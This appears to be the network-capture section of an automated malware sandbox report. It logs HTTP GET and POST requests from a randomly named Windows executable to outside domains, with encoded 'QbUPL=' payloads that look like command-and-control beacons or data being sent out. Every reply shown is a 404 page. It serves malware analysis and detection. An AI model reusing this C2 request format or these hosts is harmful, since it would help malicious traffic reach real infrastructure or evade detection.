                                                                    Jan 11, 2025 08:17:06.281265974 CET478OUTGET /8qt7/?QbUPL=FpCuTMU+yGtduI5RRmSeut/xWTwd9fsLSpRJwwRFNKDd6qo9VMAnWwDYglhkdC4Vi65aP7UQN4CBUilkwxZXiJxWYm89PNrsVDefynVEbypj6mz/ajpHDG/8Uzc6QbTSEQ6i7rwMVRjg&ef4=TJYXELnhFJhl HTTP/1.1
                                                                    Host: www.ytsd88.top
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Jan 11, 2025 08:17:07.188996077 CET574INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 07:17:07 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 409
                                                                    Connection: close
                                                                    ETag: "66d016cf-199"
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                    Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.74997874.48.143.82806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:17:12.735057116 CET735OUTPOST /mlxg/ HTTP/1.1
                                                                    Host: www.bpgroup.site
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.bpgroup.site
                                                                    Referer: http://www.bpgroup.site/mlxg/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 218
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 52 53 62 35 4c 54 70 43 43 46 74 42 55 34 5a 68 66 33 66 42 76 31 69 59 76 48 7a 56 4f 34 37 6f 7a 48 38 47 76 63 62 6c 78 72 43 49 39 34 41 61 65 41 74 50 6f 4d 45 67 54 7a 45 47 5a 41 37 75 6c 78 37 42 42 57 38 44 55 30 35 77 78 58 70 4c 48 62 76 4b 4f 73 39 38 5a 44 62 4c 47 69 7a 73 76 52 53 6b 74 6d 4e 73 35 38 36 44 77 58 47 49 66 46 61 4c 31 54 79 53 4f 57 6c 50 70 43 58 78 61 30 74 35 32 6f 57 2f 42 62 76 38 41 44 76 70 78 4d 2f 38 74 4c 50 7a 56 6e 4f 37 68 70 66 58 6f 51 34 74 58 78 43 41 63 4c 39 32 69 2f 52 5a 68 45 41 66 68 38 33 7a 6d 42 68 62 45 6d 79 59 75 75 57 63 2f 35 7a 33 49 49 30 71 75 6b 31 4a 43 67 3d 3d
                                                                    Data Ascii: QbUPL=RSb5LTpCCFtBU4Zhf3fBv1iYvHzVO47ozH8GvcblxrCI94AaeAtPoMEgTzEGZA7ulx7BBW8DU05wxXpLHbvKOs98ZDbLGizsvRSktmNs586DwXGIfFaL1TySOWlPpCXxa0t52oW/Bbv8ADvpxM/8tLPzVnO7hpfXoQ4tXxCAcL92i/RZhEAfh83zmBhbEmyYuuWc/5z3II0quk1JCg==
                                                                    Jan 11, 2025 08:17:13.306324959 CET1236INHTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 1251
                                                                    date: Sat, 11 Jan 2025 07:17:13 GMT
                                                                    server: LiteSpeed
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                    Jan 11, 2025 08:17:13.306370020 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                    Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.74997974.48.143.82806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:17:15.291090965 CET755OUTPOST /mlxg/ HTTP/1.1
                                                                    Host: www.bpgroup.site
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.bpgroup.site
                                                                    Referer: http://www.bpgroup.site/mlxg/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 238
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 52 53 62 35 4c 54 70 43 43 46 74 42 55 59 70 68 63 55 33 42 2f 6c 69 5a 6a 6e 7a 56 45 59 37 73 7a 48 41 47 76 59 44 31 78 5a 57 49 39 5a 77 61 50 78 74 50 6b 73 45 67 59 54 46 4f 64 41 37 6c 6c 78 32 2b 42 55 6f 44 55 30 74 77 78 57 5a 4c 47 73 44 4a 63 73 39 2b 52 6a 62 46 49 43 7a 73 76 52 53 6b 74 6d 5a 47 35 38 69 44 77 48 32 49 5a 6b 61 49 30 54 79 54 50 57 6c 50 74 43 58 31 61 30 74 68 32 70 62 55 42 64 7a 38 41 43 66 70 78 34 6a 2f 2b 72 50 31 4c 58 50 50 6f 64 53 6c 67 41 6f 6f 66 52 57 57 65 35 45 51 75 70 51 37 37 6d 4d 7a 2f 74 50 49 69 44 46 74 54 41 76 74 73 76 53 45 79 62 48 57 58 2f 52 41 6a 32 55 4e 55 58 5a 39 55 36 57 6b 6b 6b 4a 57 2f 77 44 64 76 4f 47 4e 2f 4e 30 3d
                                                                    Data Ascii: QbUPL=RSb5LTpCCFtBUYphcU3B/liZjnzVEY7szHAGvYD1xZWI9ZwaPxtPksEgYTFOdA7llx2+BUoDU0twxWZLGsDJcs9+RjbFICzsvRSktmZG58iDwH2IZkaI0TyTPWlPtCX1a0th2pbUBdz8ACfpx4j/+rP1LXPPodSlgAoofRWWe5EQupQ77mMz/tPIiDFtTAvtsvSEybHWX/RAj2UNUXZ9U6WkkkJW/wDdvOGN/N0=
                                                                    Jan 11, 2025 08:17:15.867742062 CET1236INHTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 1251
                                                                    date: Sat, 11 Jan 2025 07:17:16 GMT
                                                                    server: LiteSpeed
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                    Jan 11, 2025 08:17:15.867795944 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                    Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.74998074.48.143.82806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:17:17.833518028 CET1768OUTPOST /mlxg/ HTTP/1.1
                                                                    Host: www.bpgroup.site
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.bpgroup.site
                                                                    Referer: http://www.bpgroup.site/mlxg/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1250
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 52 53 62 35 4c 54 70 43 43 46 74 42 55 59 70 68 63 55 33 42 2f 6c 69 5a 6a 6e 7a 56 45 59 37 73 7a 48 41 47 76 59 44 31 78 5a 4f 49 38 72 34 61 64 69 46 50 71 4d 45 67 44 7a 46 4e 64 41 37 43 6c 78 75 79 42 55 6b 31 55 32 56 77 77 77 74 4c 42 64 44 4a 57 73 39 2b 64 44 62 49 47 69 79 30 76 52 43 67 74 6d 4a 47 35 38 69 44 77 42 79 49 65 31 61 49 35 7a 79 53 4f 57 6c 35 70 43 58 64 61 30 46 78 32 70 65 76 42 72 44 38 41 69 50 70 71 72 4c 2f 39 4c 50 33 4b 58 50 58 6f 61 61 2b 67 41 6b 65 66 53 4b 34 65 35 73 51 73 38 4e 76 69 33 34 32 38 66 66 51 72 41 39 75 44 58 54 33 67 73 37 6e 32 6f 66 51 63 4d 42 68 75 67 30 54 66 79 77 44 44 38 66 62 67 45 6b 61 35 58 65 33 33 76 75 72 73 6f 49 6d 51 4e 72 59 75 46 36 55 4c 52 61 67 34 5a 4d 72 6d 58 4c 6e 62 6e 79 53 77 79 71 69 31 69 78 70 42 6c 7a 68 78 4f 79 66 6b 73 49 33 71 56 41 36 6b 41 43 74 7a 6d 48 6b 51 6d 4d 69 6b 37 55 33 61 44 61 35 47 55 78 53 72 73 32 31 6a 55 32 76 31 6a 67 45 6b 4b 35 64 4a 67 36 43 75 58 4c 77 70 69 56 46 [TRUNCATED]
                                                                    Data Ascii: QbUPL=RSb5LTpCCFtBUYphcU3B/liZjnzVEY7szHAGvYD1xZOI8r4adiFPqMEgDzFNdA7ClxuyBUk1U2VwwwtLBdDJWs9+dDbIGiy0vRCgtmJG58iDwByIe1aI5zySOWl5pCXda0Fx2pevBrD8AiPpqrL/9LP3KXPXoaa+gAkefSK4e5sQs8Nvi3428ffQrA9uDXT3gs7n2ofQcMBhug0TfywDD8fbgEka5Xe33vursoImQNrYuF6ULRag4ZMrmXLnbnySwyqi1ixpBlzhxOyfksI3qVA6kACtzmHkQmMik7U3aDa5GUxSrs21jU2v1jgEkK5dJg6CuXLwpiVFkn6qB9mBgfZPAuP3baXzhTvRMCyYHu1rcdwfx5f8llCVFRShhM+UVDIBdc5QSD7NN/0H/IS4f14FsxY/7TL7Z8v524mK4QLRGQXHAnpEVa9ZwDFfTEhYwUKiJU25yXQz+2yitkE5qOw40kDa8Ia2jHUhtjuO/EaIW3lGq7SG4o8+bQsuVxVtdgsgwNkos4JQSRxq9Inhn2iZgn++WCbnh09MI4KeGZeX5ezFBWh5Xt5TQ8vNr7V0Oggd+m1sf2GJsamDupzvFMwu4abSOeo+H5EpxMCsaix7uGJK7lzE/ZB/iphOL7JX8ZyJ7IeCAbIuYwBFH8iN0FygUXetSbM4eNwMQubETE1tSNvuN0BGArEgImTdYume1JGFfh2f6lqCi7euTBgjBSfuT7yxkyhiWdh8eNwV4alRx1WLE4KqAvy9hsORYFnmjHm90Z57t4KSP9NgKmNJhE7Ye/7LQodYuIdebRWv5QCDsZQ6uhlN17NY7nghVISPiM/9aHTthqIvVV9KRFuR9GAjbED9Oo2gIaT0hOtNxxZ5D654EH2IaHgUtCO8k1dXB54tQXon01lAHLgNCOaiqaeylsmaaxkzrN2AYeNoNTaHmLK4L+SN+TZIPmZNKB3wUf+asnLiHZL3sRvIWtlngp1pXfgqOLdWXgQgeqkX4edY39 [TRUNCATED]
                                                                    Jan 11, 2025 08:17:18.395745993 CET1236INHTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 1251
                                                                    date: Sat, 11 Jan 2025 07:17:18 GMT
                                                                    server: LiteSpeed
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                    Jan 11, 2025 08:17:18.395800114 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                    Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.74998174.48.143.82806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:17:20.377585888 CET480OUTGET /mlxg/?QbUPL=cQzZIkxePH03UbtQeBzk4injmTvYH6638l8io/jKjoXZ1YEXRx5ntf5pTkNOcA/fsinJED0Fc0Ua6QV4aMGraedJXjbbCkeYoQqBrGkjzfTHxGy2G2a4+AXnGm9DtiGGRVBQ2NqOGZfd&ef4=TJYXELnhFJhl HTTP/1.1
                                                                    Host: www.bpgroup.site
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Jan 11, 2025 08:17:20.955022097 CET1236INHTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 1251
                                                                    date: Sat, 11 Jan 2025 07:17:21 GMT
                                                                    server: LiteSpeed
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                    Jan 11, 2025 08:17:20.955048084 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                    Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.74998213.248.169.48806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:17:26.007778883 CET744OUTPOST /dash/ HTTP/1.1
                                                                    Host: www.fortevision.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.fortevision.xyz
                                                                    Referer: http://www.fortevision.xyz/dash/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 218
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 56 4f 76 68 74 72 41 48 41 55 51 64 69 73 4f 58 5a 4e 4c 6a 63 4b 4b 64 30 73 66 4f 32 4a 42 53 61 48 45 52 32 54 33 63 53 4b 6a 76 52 76 56 67 4a 6c 74 75 45 44 6f 42 51 68 78 31 6f 65 41 68 31 2f 48 4e 33 72 39 50 79 47 59 50 70 6a 59 4f 33 67 4e 50 6a 75 39 6a 55 4a 53 44 44 39 49 32 76 2f 6a 30 2b 35 63 75 78 46 55 2f 75 39 33 69 78 34 71 61 65 65 65 53 58 50 75 50 73 38 68 32 7a 66 66 78 5a 72 57 76 74 63 59 4f 54 33 59 4c 31 65 53 47 79 64 73 7a 65 66 42 36 57 4b 74 37 74 51 70 37 4f 5a 79 72 54 4f 79 52 30 49 4e 73 36 77 7a 41 52 31 6a 70 49 37 76 4a 53 6d 70 70 62 57 55 67 70 70 4c 46 2b 78 75 42 58 35 38 43 44 77 3d 3d
